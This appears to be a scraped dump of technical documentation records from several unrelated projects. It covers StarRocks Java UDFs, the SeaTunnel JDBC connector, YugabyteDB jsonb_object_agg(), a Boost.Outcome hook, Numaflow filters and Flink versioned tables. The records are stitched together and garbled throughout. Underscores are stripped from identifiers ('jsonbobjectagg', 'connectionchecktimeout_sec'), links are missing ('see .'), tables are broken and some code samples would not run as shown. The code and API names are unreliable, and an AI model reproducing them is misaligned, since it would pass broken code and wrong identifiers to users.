serialized or deserialized when they are transmitted between nodes for execution. Therefore, you must also use the `serializeLength` variable to specify the length that is allowed for the deserialization of intermediate results. | | serializeLength() | The length that is allowed for the deserialization of intermediate results. 
Unit: bytes. Set this local variable to an INT-type value. For example, `State { int counter = 0; public int serializeLength() { return 4; }}` specifies that intermediate results are of the INT data type and the length for deserialization is 4 bytes. You can adjust these settings based on your business" }, { "data": "For example, if you want to specify the data type of intermediate results as LONG and the length for deserialization as 8 bytes, pass `State { long counter = 0; public int serializeLength() { return 8; }}`. | Take note of the following points for the deserialization of intermediate results stored in the `java.nio.ByteBuffer` class: The remaining() method that is dependent on the `ByteBuffer` class cannot be called to deserialize a state. The clear() method cannot be called on the `ByteBuffer` class. The value of `serializeLength` must be the same as the length of the written-in data. Otherwise, incorrect results are generated during serialization and deserialization. Unlike regular aggregate functions, a UDWF operates on a set of multiple rows, which are collectively called a window, and returns a value for each row. A typical window function includes an `OVER` clause that divides rows into multiple sets. It performs a calculation across each set of rows and returns a value for each row. Suppose that you want to compile a UDWF named `MYWINDOWSUMINT`. Unlike the built-in aggregate function `SUM`, which returns BIGINT-type values, the `MYWINDOWSUMINT` function supports only request parameters and returns parameters of the INT data type. ```Java package com.starrocks.udf.sample; public class WindowSumInt { public static class State { int counter = 0; public int serializeLength() { return 4; } @Override public String toString() { return \"State{\" + \"counter=\" + counter + '}'; } } public State create() { return new State(); } public void destroy(State state) { } public void update(State state, Integer val) { if (val != null) { state.counter+=val; } } public void serialize(State state, java.nio.ByteBuffer buff) { buff.putInt(state.counter); } public void merge(State state, java.nio.ByteBuffer buffer) { int val = buffer.getInt(); state.counter += val; } public Integer finalize(State state) { return state.counter; } public void reset(State state) { state.counter = 0; } public void windowUpdate(State state, int peergroupstart, int peergroupend, int framestart, int frameend, Integer[] inputs) { for (int i = (int)framestart; i < (int)frameend; ++i) { state.counter += inputs[i]; } } } ``` The user-defined class must implement the method required by UDAFs (because a UDWF is a special aggregate function) and the windowUpdate() method described in the following table. NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | -- | | | void windowUpdate(State state, int, int, int , int, ...) | Updates the data of the window. For more information about UDWFs, see . Every time when you enter a row as input, this method obtains the window information and updates intermediate results accordingly.<ul><li>`peergroupstart`: the start position of the current partition. `PARTITION BY` is used in the OVER clause to specify a partition column. 
Rows with the same values in the partition column are considered to be in the same partition.</li><li>`peergroupend`: the end position of the current partition.</li><li>`framestart`: the start position of the current window" }, { "data": "The window frame clause specifies a calculation range, which covers the current row and the rows that are within a specified distance to the current row. For example, `ROWS BETWEEN 1 PRECEDING AND 1 FOLLOWING` specifies a calculation range that covers the current row, the previous row before the current row, and the following row after the current row.</li><li>`frameend`: the end position of the current window frame.</li><li>`inputs`: the data that is entered as the input to a window. The data is an array package that supports only specific data types. In this example, INT values are entered as input, and the array package is Integer[].</li></ul> | A UDTF reads one row of data and returns multiple values that can be considered to be a table. Table-valued functions are typically used to transform rows into columns. NOTE StarRocks allows a UDTF to return a table that consists of multiple rows and one column. Suppose that you want to compile a UDTF named `MYUDFSPLIT`. The `MYUDFSPLIT` function allows you to use spaces as delimiters and supports request parameters and return parameters of the STRING data type. ```Java package com.starrocks.udf.sample; public class UDFSplit{ public String[] process(String in) { if (in == null) return null; return in.split(\" \"); } } ``` The method defined by the user-defined class must meet the following requirements: NOTE The data types of the request parameters and return parameters in the method must be the same as those declared in the `CREATE FUNCTION` statement that is to be executed in and conform to the mapping that is provided in the \"\" section of this topic. | Method | Description | | - | -- | | TYPE[] process() | Runs the UDTF and returns an array. | Run the following command to package the Java project: ```Bash mvn package ``` The following JAR files are generated in the target folder: udf-1.0-SNAPSHOT.jar and udf-1.0-SNAPSHOT-jar-with-dependencies.jar. Upload the JAR file udf-1.0-SNAPSHOT-jar-with-dependencies.jar to an HTTP server that keeps up and running and is accessible to all FEs and BEs in your StarRocks cluster. Then, run the following command to deploy the file: ```Bash mvn deploy ``` You can set up a simple HTTP server by using Python and upload the JAR file to that HTTP server. NOTE In , the FEs will check the JAR file that contains the code for the UDF and calculate the checksum, and the BEs will download and execute the JAR file. StarRocks allows you to create UDFs in two types of namespaces: database namespaces and global namespaces. If you do not have visibility or isolation requirements for a UDF, you can create it as a global UDF. Then, you can reference the global UDF by using the function name without including the catalog and database names as prefixes to the function name. If you have visibility or isolation requirements for a UDF, or if you need to create the same UDF in different databases, you can create it in each individual" }, { "data": "As such, if your session is connected to the target database, you can reference the UDF by using the function name. 
If your session is connected to a different catalog or database other than the target database, you need to reference the UDF by including the catalog and database names as prefixes to the function name, for example, `catalog.database.function`. NOTICE Before you create and use a global UDF, you must contact the system administrator to grant you the required permissions. For more information, see . After you upload the JAR package, you can create UDFs in StarRocks. For a global UDF, you must include the `GLOBAL` keyword in the creation statement. ```sql CREATE FUNCTION function_name (arg_type [, ...]) RETURNS return_type PROPERTIES (\"key\" = \"value\" [, ...]) ``` | Parameter | Required | Description | | - | -- | | | GLOBAL | No | Whether to create a global UDF, supported from v3.0. | | AGGREGATE | No | Whether to create a UDAF or UDWF. | | TABLE | No | Whether to create a UDTF. If both `AGGREGATE` and `TABLE` are not specified, a Scalar function is created. | | functionname | Yes | The name of the function you want to create. You can include the name of the database in this parameter, for example,`db1.myfunc`. If `function_name` includes the database name, the UDF is created in that database. Otherwise, the UDF is created in the current database. The name of the new function and its parameters cannot be the same as an existing name in the destination database. Otherwise, the function cannot be created. The creation succeeds if the function name is the same but the parameters are different. | | arg_type | Yes | Argument type of the function. The added argument can be represented by `, ...`. For the supported data types, see .| | return_type | Yes | The return type of the function. For the supported data types, see . | | PROPERTIES | Yes | Properties of the function, which vary depending on the type of the UDF to create. | Run the following command to create the scalar UDF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] FUNCTION MYUDFJSON_GET(string, string) RETURNS string PROPERTIES ( \"symbol\" = \"com.starrocks.udf.sample.UDFJsonGet\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` | Parameter | Description | | | | | symbol | The name of the class for the Maven project to which the UDF belongs. The value of this parameter is in the `<packagename>.<classname>` format. | | type | The type of the UDF. Set the value to `StarrocksJar`, which specifies that the UDF is a Java-based function. | | file | The HTTP URL from which you can download the JAR file that contains the code for the UDF. The value of this parameter is in the `http://<httpserverip>:<httpserverport>/<jarpackagename>` format. | Run the following command to create the UDAF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] AGGREGATE FUNCTION MYSUMINT(INT) RETURNS INT PROPERTIES ( \"symbol\" = \"com.starrocks.udf.sample.SumInt\", \"type\" = \"StarrocksJar\", \"file\" =" }, { "data": "); ``` The descriptions of the parameters in PROPERTIES are the same as those in . Run the following command to create the UDWF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] AGGREGATE FUNCTION MYWINDOWSUM_INT(Int) RETURNS Int properties ( \"analytic\" = \"true\", \"symbol\" = \"com.starrocks.udf.sample.WindowSumInt\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` `analytic`: Whether the UDF is a window function. Set the value to `true`. 
The descriptions of other properties are the same as those in . Run the following command to create the UDTF you have compiled in the preceding example: ```SQL CREATE [GLOBAL] TABLE FUNCTION MYUDFSPLIT(string) RETURNS string properties ( \"symbol\" = \"com.starrocks.udf.sample.UDFSplit\", \"type\" = \"StarrocksJar\", \"file\" = \"http://httphost:httpport/udf-1.0-SNAPSHOT-jar-with-dependencies.jar\" ); ``` The descriptions of the parameters in PROPERTIES are the same as those in . After you create the UDF, you can test and use it based on your business needs. Run the following command to use the scalar UDF you have created in the preceding example: ```SQL SELECT MYUDFJSON_GET('{\"key\":\"{\\\\\"in\\\\\":2}\"}', '$.key.in'); ``` Run the following command to use the UDAF you have created in the preceding example: ```SQL SELECT MYSUMINT(col1); ``` Run the following command to use the UDWF you have created in the preceding example: ```SQL SELECT MYWINDOWSUM_INT(intcol) OVER (PARTITION BY intcol2 ORDER BY intcol3 ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) FROM test_basic; ``` Run the following command to use the UDTF you have created in the preceding example: ```Plain -- Suppose that you have a table named t1, and the information about its columns a, b, and c1 is as follows: SELECT t1.a,t1.b,t1.c1 FROM t1; output: 1,2.1,\"hello world\" 2,2.2,\"hello UDTF.\" -- Run the MYUDFSPLIT() function. SELECT t1.a,t1.b, MYUDFSPLIT FROM t1, MYUDFSPLIT(t1.c1); output: 1,2.1,\"hello\" 1,2.1,\"world\" 2,2.2,\"hello\" 2,2.2,\"UDTF.\" ``` NOTE The first `MYUDFSPLIT` in the preceding code snippet is the alias of the column that is returned by the second `MYUDFSPLIT`, which is a function. You cannot use `AS t2(f1)` to specify the aliases of the table and its columns that are to be returned. Run the following command to query UDFs: ```SQL SHOW [GLOBAL] FUNCTIONS; ``` For more information, see . Run the following command to drop a UDF: ```SQL DROP [GLOBAL] FUNCTION <functionname>(argtype [, ...]); ``` For more information, see . | SQL TYPE | Java TYPE | | -- | -- | | BOOLEAN | java.lang.Boolean | | TINYINT | java.lang.Byte | | SMALLINT | java.lang.Short | | INT | java.lang.Integer | | BIGINT | java.lang.Long | | FLOAT | java.lang.Float | | DOUBLE | java.lang.Double | | STRING/VARCHAR | java.lang.String | Configure the following environment variable in the be/conf/be.conf file of each Java virtual machine (JVM) in your StarRocks cluster to control memory usage. If you use JDK 8, configure `JAVAOPTS`. If you use JDK 9 or later, configure `JAVAOPTSFORJDK9AND_LATER`. ```Bash JAVA_OPTS=\"-Xmx12G\" JAVAOPTSFORJDK9ANDLATER=\"-Xmx12G\" ``` Can I use static variables when I create UDFs? Do the static variables of different UDFs have mutual impacts on each other? Yes, you can use static variables when you compile UDFs. The static variables of different UDFs are isolated from each other and do not affect each other even if the UDFs have classes with identical names." } ]
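To illustrate the FAQ answer above, the following is a small, hypothetical scalar UDF that keeps a static call counter; the class name and behavior are illustrative and are not part of the StarRocks samples. Because the classes of different UDFs are isolated, another UDF that defines a class with the same name gets its own copy of the counter. Note also that the counter lives inside a single JVM, so it is per-process state and should not be relied on for any global bookkeeping. ```Java package com.starrocks.udf.sample; import java.util.concurrent.atomic.AtomicLong; // Hypothetical scalar UDF (declared with RETURNS BIGINT) that counts how many // times evaluate() has been called within this UDF's own class loader. public class UDFCallCounter { private static final AtomicLong CALLS = new AtomicLong(); public final Long evaluate(String ignored) { return CALLS.incrementAndGet();   // isolated from other UDFs, even same-named classes } } ```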
{ "category": "App Definition and Development", "file_name": "Jdbc.md", "project_name": "SeaTunnel", "subcategory": "Streaming & Messaging" }
[ { "data": "JDBC source connector Read external data source data through JDBC. :::tip Warn: for license compliance, you have to provide database driver yourself, copy to `$SEATNUNNEL_HOME/lib/` directory in order to make them work. e.g. If you use MySQL, should download and copy `mysql-connector-java-xxx.jar` to `$SEATNUNNELHOME/lib/`. For Spark/Flink, you should also copy it to `$SPARKHOME/jars/` or `$FLINK_HOME/lib/`. ::: You need to ensure that the has been placed in directory `${SEATUNNEL_HOME}/plugins/`. You need to ensure that the has been placed in directory `${SEATUNNEL_HOME}/lib/`. supports query SQL and can achieve projection effect. | name | type | required | default value | |--|--|-|--| | url | String | Yes | - | | driver | String | Yes | - | | user | String | No | - | | password | String | No | - | | query | String | No | - | | compatible_mode | String | No | - | | connectionchecktimeout_sec | Int | No | 30 | | partition_column | String | No | - | | partitionupperbound | Long | No | - | | partitionlowerbound | Long | No | - | | partition_num | Int | No | job parallelism | | fetch_size | Int | No | 0 | | properties | Map | No | - | | table_path | String | No | - | | table_list | Array | No | - | | where_condition | String | No | - | | split.size | Int | No | 8096 | | split.even-distribution.factor.lower-bound | Double | No | 0.05 | | split.even-distribution.factor.upper-bound | Double | No | 100 | | split.sample-sharding.threshold | Int | No | 1000 | | split.inverse-sampling.rate | Int | No | 1000 | | common-options | | No | - | The jdbc class name used to connect to the remote data source, if you use MySQL the value is `com.mysql.cj.jdbc.Driver`. userName password The URL of the JDBC connection. Refer to a case: jdbc:postgresql://localhost/test Query statement The compatible mode of database, required when the database supports multiple compatible modes. For example, when using OceanBase database, you need to set it to 'mysql' or 'oracle'. The time in seconds to wait for the database operation used to validate the connection to complete. For queries that return a large number of objects, you can configure the row fetch size used in the query to improve performance by reducing the number database hits required to satisfy the selection criteria. Zero means use jdbc default value. Additional connection configuration parameters,when properties and URL have the same parameters, the priority is determined by the <br/>specific implementation of the driver. For example, in MySQL, properties take precedence over the URL. The path to the full path of table, you can use this configuration instead of `query`. examples: mysql: \"testdb.table1\" oracle: \"test_schema.table1\" sqlserver: \"testdb.test_schema.table1\" postgresql: \"testdb.test_schema.table1\" iris: \"test_schema.table1\" The list of tables to be read, you can use this configuration instead of `table_path` example ```hocon table_list = [ { table_path = \"testdb.table1\" } { table_path = \"testdb.table2\" query = \"select * from testdb.table2 where id > 100\" } ] ``` Common row filter conditions for all tables/queries, must start with `where`. for example `where id > 100` Source plugin common parameters, please refer to for details. The JDBC Source connector supports parallel reading of data from" }, { "data": "SeaTunnel will use certain rules to split the data in the table, which will be handed over to readers for reading. The number of readers is determined by the `parallelism` option. 
Split Key Rules: If `partition_column` is not null, it will be used to calculate the splits. The column must be in the supported split data types. If `partition_column` is null, SeaTunnel will read the schema from the table and get the Primary Key and Unique Index. If there is more than one column in the Primary Key and Unique Index, the first column that is in the supported split data types will be used to split the data. For example, if the table has Primary Key(nn guid, name varchar), because `guid` is not in the supported split data types, the column `name` will be used to split the data. Supported split data types: String Number(int, bigint, decimal, ...) Date How many rows in one split; captured tables are split into multiple splits when the table is read. Not recommended for use. The lower bound of the chunk key distribution factor. This factor (i.e., (MAX(id) - MIN(id) + 1) / row count) is used to determine whether the table data is evenly distributed. If the distribution factor is calculated to be greater than or equal to this lower bound, the table chunks would be optimized for even distribution. Otherwise, if the distribution factor is less, the table will be considered as unevenly distributed and the sampling-based sharding strategy will be used if the estimated shard count exceeds the value specified by `sample-sharding.threshold`. The default value is 0.05. Not recommended for use. The upper bound of the chunk key distribution factor. This factor (i.e., (MAX(id) - MIN(id) + 1) / row count) is used to determine whether the table data is evenly distributed. If the distribution factor is calculated to be less than or equal to this upper bound, the table chunks would be optimized for even distribution. Otherwise, if the distribution factor is greater, the table will be considered as unevenly distributed and the sampling-based sharding strategy will be used if the estimated shard count exceeds the value specified by `sample-sharding.threshold`. The default value is 100.0. This configuration specifies the threshold of estimated shard count that triggers the sample sharding strategy. When the distribution factor is outside the bounds specified by `chunk-key.even-distribution.factor.upper-bound` and `chunk-key.even-distribution.factor.lower-bound`, and the estimated shard count (calculated as approximate row count / chunk size) exceeds this threshold, the sample sharding strategy will be used. This can help to handle large datasets more efficiently. The default value is 1000 shards. The inverse of the sampling rate used in the sample sharding strategy. For example, if this value is set to 1000, it means a 1/1000 sampling rate is applied during the sampling process. This option provides flexibility in controlling the granularity of the sampling, thus affecting the final number of shards. It's especially useful when dealing with very large datasets where a lower sampling rate is preferred. The default value is 1000. The column name for splitting the data. The partition_column max value for the scan; if not set, SeaTunnel will query the database to get the max value. The partition_column min value for the scan; if not set, SeaTunnel will query the database to get the min value. Not recommended for use; the correct approach is to control the number of splits through `split.size`. How many splits we need to split into; only positive integers are supported. The default value is the job parallelism. If the table can not be split (for example, the table has no Primary Key or Unique Index, and `partition_column` is not set), it will run in single concurrency. 
Use `tablepath` to replace `query` for single table reading. If you need to read multiple tables, use `tablelist`. there are some reference value for params above. | datasource | driver | url | maven | |-|--||-| | mysql | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | postgresql | org.postgresql.Driver | jdbc:postgresql://localhost:5432/postgres | https://mvnrepository.com/artifact/org.postgresql/postgresql | | dm | dm.jdbc.driver.DmDriver | jdbc:dm://localhost:5236 | https://mvnrepository.com/artifact/com.dameng/DmJdbcDriver18 | | phoenix | org.apache.phoenix.queryserver.client.Driver | jdbc:phoenix:thin:url=http://localhost:8765;serialization=PROTOBUF | https://mvnrepository.com/artifact/com.aliyun.phoenix/ali-phoenix-shaded-thin-client | | sqlserver | com.microsoft.sqlserver.jdbc.SQLServerDriver | jdbc:sqlserver://localhost:1433 | https://mvnrepository.com/artifact/com.microsoft.sqlserver/mssql-jdbc | | oracle | oracle.jdbc.OracleDriver | jdbc:oracle:thin:@localhost:1521/xepdb1 | https://mvnrepository.com/artifact/com.oracle.database.jdbc/ojdbc8 | | sqlite | org.sqlite.JDBC | jdbc:sqlite:test.db | https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc | | gbase8a | com.gbase.jdbc.Driver | jdbc:gbase://e2egbase8aDb:5258/test | https://www.gbase8.cn/wp-content/uploads/2020/10/gbase-connector-java-8.3.81.53-build55.5.7-binmin_mix.jar | | starrocks | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | db2 | com.ibm.db2.jcc.DB2Driver | jdbc:db2://localhost:50000/testdb | https://mvnrepository.com/artifact/com.ibm.db2.jcc/db2jcc/db2jcc4 | | tablestore | com.alicloud.openservices.tablestore.jdbc.OTSDriver | \"jdbc:ots:http s://myinstance.cn-hangzhou.ots.aliyuncs.com/myinstance\" | https://mvnrepository.com/artifact/com.aliyun.openservices/tablestore-jdbc | | saphana | com.sap.db.jdbc.Driver | jdbc:sap://localhost:39015 | https://mvnrepository.com/artifact/com.sap.cloud.db.jdbc/ngdbc | | doris | com.mysql.cj.jdbc.Driver | jdbc:mysql://localhost:3306/test | https://mvnrepository.com/artifact/mysql/mysql-connector-java | | teradata | com.teradata.jdbc.TeraDriver | jdbc:teradata://localhost/DBS_PORT=1025,DATABASE=test | https://mvnrepository.com/artifact/com.teradata.jdbc/terajdbc | | Snowflake | net.snowflake.client.jdbc.SnowflakeDriver | jdbc:snowflake://<account_name>.snowflakecomputing.com | https://mvnrepository.com/artifact/net.snowflake/snowflake-jdbc | | Redshift | com.amazon.redshift.jdbc42.Driver | jdbc:redshift://localhost:5439/testdb?defaultRowFetchSize=1000 | https://mvnrepository.com/artifact/com.amazon.redshift/redshift-jdbc42 | | Vertica | com.vertica.jdbc.Driver | jdbc:vertica://localhost:5433 | https://repo1.maven.org/maven2/com/vertica/jdbc/vertica-jdbc/12.0.3-0/vertica-jdbc-12.0.3-0.jar | | Kingbase | com.kingbase8.Driver | jdbc:kingbase8://localhost:54321/db_test | https://repo1.maven.org/maven2/cn/com/kingbase/kingbase8/8.6.0/kingbase8-8.6.0.jar | | OceanBase | com.oceanbase.jdbc.Driver | jdbc:oceanbase://localhost:2881 | https://repo1.maven.org/maven2/com/oceanbase/oceanbase-client/2.4.3/oceanbase-client-2.4.3.jar | | Hive | org.apache.hive.jdbc.HiveDriver | jdbc:hive2://localhost:10000 | https://repo1.maven.org/maven2/org/apache/hive/hive-jdbc/3.1.3/hive-jdbc-3.1.3-standalone.jar | | xugu | com.xugu.cloudjdbc.Driver | jdbc:xugu://localhost:5138 | 
https://repo1.maven.org/maven2/com/xugudb/xugu-jdbc/12.2.0/xugu-jdbc-12.2.0.jar | | InterSystems IRIS | com.intersystems.jdbc.IRISDriver | jdbc:IRIS://localhost:1972/%SYS | https://raw.githubusercontent.com/intersystems-community/iris-driver-distribution/main/JDBC/JDK18/intersystems-jdbc-3.8.4.jar | ``` Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" } ``` ``` env { parallelism = 10 job.mode = \"BATCH\" } source { Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" partition_column = \"id\" split.size = 10000 } } sink { Console {} } ``` It is more efficient to specify the data within the upper and lower bounds of the query. It is more efficient to read your data source according to the upper and lower boundaries you configured. ``` source { Jdbc { url = \"jdbc:mysql://localhost:3306/test?serverTimezone=GMT%2b8&useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" query = \"select * from type_bin\" partition_column = \"id\" partitionlowerbound = 1 partitionupperbound = 500 partition_num = 10 properties { useSSL=false } } } ``` Configuring `table_path` will turn on auto split, you can configure `split.*` to adjust the split strategy ``` env { parallelism = 10 job.mode = \"BATCH\" } source { Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" table_path = \"testdb.table1\" query = \"select * from testdb.table1\" split.size = 10000 } } sink { Console {} } ``` *Configuring `table_list` will turn on auto split, you can configure `split.*` to adjust the split strategy* ```hocon Jdbc { url = \"jdbc:mysql://localhost/test?serverTimezone=GMT%2b8\" driver = \"com.mysql.cj.jdbc.Driver\" connectionchecktimeout_sec = 100 user = \"root\" password = \"123456\" table_list = [ { table_path = \"testdb.table1\" }, { table_path = \"testdb.table2\" query = \"select id, name from testdb.table2 where id > 100\" } ] } ``` Add ClickHouse Source Connector ) ) ) ) ) ) ) ) ) ) ) ) ) ) )" } ]
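To make the split heuristics above concrete, here is a small worked example (the numbers are hypothetical and not taken from the SeaTunnel docs): suppose the split key `id` ranges from 1 to 8,000,000 over 8,000,000 rows. The distribution factor is (8,000,000 - 1 + 1) / 8,000,000 = 1.0, which falls inside the default bounds [0.05, 100], so the table is treated as evenly distributed and is read in roughly 8,000,000 / 8096 ≈ 988 splits of `split.size` rows each. Sampling-based sharding would only come into play if the factor fell outside those bounds and the estimated shard count exceeded `split.sample-sharding.threshold` (1000 by default), in which case rows would be sampled at 1/`split.inverse-sampling.rate`.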
{ "category": "App Definition and Development", "file_name": "jsonb-object-agg.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: jsonbobjectagg() headerTitle: jsonbobjectagg() linkTitle: jsonbobjectagg() description: Aggregate a SETOF values into a JSON object. menu: v2.18: identifier: jsonb-object-agg parent: json-functions-operators weight: 155 type: docs Purpose: This is an aggregate function. (Aggregate functions compute a single result from a `SETOF` input values.) It creates a JSON object whose values are the JSON representations of the aggregated SQL values. It is most useful when these to-be-aggregated values are \"row\" type values with two fields. The first represents the key and the second represents the value of the intended JSON object's key-value pair. Signature: ``` input value: anyelement return value: jsonb ``` Notes: The syntax \"order by... nulls first\" within the parentheses of the aggregate function (a generic feature of aggregate functions) isn't useful here because the order of the key-value pairs of a JSON object has no semantic significance. (The `::text` typecast of a `jsonb` object uses the convention of ordering the pairs alphabetically by the key. ```plpgsql do $body$ declare object_agg jsonb not null := '\"?\"'; expectedobjectagg constant jsonb not null := '{\"f1\": 1, \"f2\": 2, \"f3\": null, \"f4\": 4}'::jsonb; begin with tab as ( values ('f4'::text, 4::int), ('f1'::text, 1::int), ('f3'::text, null::int), ('f2'::text, 2::int)) select jsonbobjectagg(column1, column2) into strict object_agg from tab; assert (objectagg = expectedobject_agg), 'unexpected'; end; $body$; ``` An object is a set of key-value pairs where each key is unique and the order is undefined and insignificant. (As explained earlier, when a JSON literal is This example emphasizes the property of a JSON object that keys are unique. (See the accounts of the functions.) This means that if a key-value pair is specified more than once, then the one that is most recently specified wins. You see the same rule at work here: ```plpgsql select ('{\"f2\": 42, \"f7\": 7, \"f2\": null}'::jsonb)::text; ``` It shows this: ``` text -- {\"f2\": null, \"f7\": 7} ``` The `DO` block specifies both the value for key \"f2\" and the value for key \"f7\" twice: ```plpgsql do $body$ declare object_agg jsonb not null := '\"?\"'; expectedobjectagg constant jsonb not null := '{\"f2\": null, \"f7\": 7}'::jsonb; begin with tab as ( values ('f2'::text, 4::int), ('f7'::text, 7::int), ('f2'::text, 1::int), ('f2'::text, null::int)) select jsonbobjectagg(column1, column2) into strict object_agg from tab; assert (objectagg = expectedobject_agg), 'unexpected'; end; $body$; ```" } ]
{ "category": "App Definition and Development", "file_name": "hook_outcome_in_place_construction.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"`void hookoutcomeinplaceconstruction(T *, inplacetype_t<U>, Args &&...) noexcept`\" description = \"(Until v2.2.0) ADL discovered free function hook invoked by the in-place constructors of `basic_outcome`.\" +++ Removed in Outcome v2.2.0, unless {{% api \"BOOSTOUTCOMEENABLELEGACYSUPPORT_FOR\" %}} is set to less than `220` to enable emulation. Use {{% api \"onoutcomeinplaceconstruction(T *, inplacetype_t<U>, Args &&...) noexcept\" %}} instead in new code. One of the constructor hooks for {{% api \"basicoutcome<T, EC, EP, NoValuePolicy>\" %}}, generally invoked by the in-place constructors of `basicoutcome`. See each constructor's documentation to see which specific hook it invokes. Overridable: By Argument Dependent Lookup. Requires: Nothing. Namespace: `BOOSTOUTCOMEV2_NAMESPACE::hooks` Header: `<boost/outcome/basic_outcome.hpp>`" } ]
{ "category": "App Definition and Development", "file_name": "filter.md", "project_name": "Numaflow", "subcategory": "Streaming & Messaging" }
[ { "data": "A `filter` is a special-purpose built-in function. It is used to evaluate on each message in a pipeline and is often used to filter the number of messages that are passed to next vertices. Filter function supports comprehensive expression language which extends flexibility write complex expressions. `payload` will be root element to represent the message object in expression. Filter expression implemented with `expr` and `sprig` libraries. These function can be accessed directly in expression. `json` - Convert payload in JSON object. e.g: `json(payload)` `int` - Convert element/payload into `int` value. e.g: `int(json(payload).id)` `string` - Convert element/payload into `string` value. e.g: `string(json(payload).amount)` `Sprig` library has 70+ functions. `sprig` prefix need to be added to access the sprig functions. E.g: `sprig.contains('James', json(payload).name)` # `James` is contained in the value of `name`. `int(json(sprig.b64dec(payload)).id) < 100` ```yaml spec: vertices: name: in source: http: {} transformer: builtin: name: filter kwargs: expression: int(json(payload).id) < 100 ```" } ]
{ "category": "App Definition and Development", "file_name": "versioned_tables.md", "project_name": "Flink", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Versioned Tables\" weight: 4 type: docs aliases: /dev/table/streaming/versioned_tables.html /dev/table/streaming/temporal_tables.html <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Flink SQL operates over dynamic tables that evolve, which may either be append-only or updating. Versioned tables represent a special type of updating table that remembers the past values for each key. Dynamic tables define relations over time. Often, particularly when working with metadata, a key's old value does not become irrelevant when it changes. Flink SQL can define versioned tables over any dynamic table with a `PRIMARY KEY` constraint and time attribute. A primary key constraint in Flink means that a column or set of columns of a table or view are unique and non-null. The primary key semantic on a upserting table means the materialized changes for a particular key (`INSERT`/`UPDATE`/`DELETE`) represent the changes to a single row over time. The time attribute on a upserting table defines when each change occurred. Taken together, Flink can track the changes to a row over time and maintain the period for which each value was valid for that key. Suppose a table tracks the prices of different products in a store. ```sql (changelog kind) updatetime productid product_name price ================= =========== ========== ============ ===== +(INSERT) 00:01:00 p_001 scooter 11.11 +(INSERT) 00:02:00 p_002 basketball 23.11 -(UPDATEBEFORE) 12:00:00 p001 scooter 11.11 +(UPDATEAFTER) 12:00:00 p001 scooter 12.99 -(UPDATEBEFORE) 12:00:00 p002 basketball 23.11 +(UPDATEAFTER) 12:00:00 p002 basketball 19.99 -(DELETE) 18:00:00 p_001 scooter 12.99 ``` Given this set of changes, we track how the price of a scooter changes over time. It is initially $11.11 at `00:01:00` when added to the catalog. The price then rises to $12.99 at `12:00:00` before being deleted from the catalog at `18:00:00`. If we queried the table for various products' prices at different times, we would retrieve different results. At `10:00:00` the table would show one set of prices. ```sql updatetime productid product_name price =========== ========== ============ ===== 00:01:00 p_001 scooter 11.11 00:02:00 p_002 basketball 23.11 ``` While at `13:00:00,` we would find another set of prices. ```sql updatetime productid product_name price =========== ========== ============ ===== 12:00:00 p_001 scooter 12.99 12:00:00 p_002 basketball 19.99 ``` Versioned tables are defined implicitly for any tables whose underlying sources or formats directly define changelogs. Examples include the source as well as database changelog formats such as and" }, { "data": "As discussed above, the only additional requirement is the `CREATE` table statement must contain a `PRIMARY KEY` and an event-time attribute. 
```sql CREATE TABLE products ( product_id STRING, product_name STRING, price DECIMAL(32, 2), update_time TIMESTAMP(3) METADATA FROM 'value.source.timestamp' VIRTUAL, PRIMARY KEY (product_id) NOT ENFORCED, WATERMARK FOR updatetime AS updatetime ) WITH (...); ``` Flink also supports defining versioned views if the underlying query contains a unique key constraint and event-time attribute. Imagine an append-only table of currency rates. ```sql CREATE TABLE currency_rates ( currency STRING, rate DECIMAL(32, 10), update_time TIMESTAMP(3), WATERMARK FOR updatetime AS updatetime ) WITH ( 'connector' = 'kafka', 'topic' = 'rates', 'properties.bootstrap.servers' = 'localhost:9092', 'format' = 'json' ); ``` The table `currency_rates` contains a row for each currency &mdash; with respect to USD &mdash; and receives a new row each time the rate changes. The `JSON` format does not support native changelog semantics, so Flink can only read this table as append-only. ```sql (changelog kind) update_time currency rate ================ ============= ========= ==== +(INSERT) 09:00:00 Yen 102 +(INSERT) 09:00:00 Euro 114 +(INSERT) 09:00:00 USD 1 +(INSERT) 11:15:00 Euro 119 +(INSERT) 11:45:00 Pounds 107 +(INSERT) 11:49:00 Pounds 108 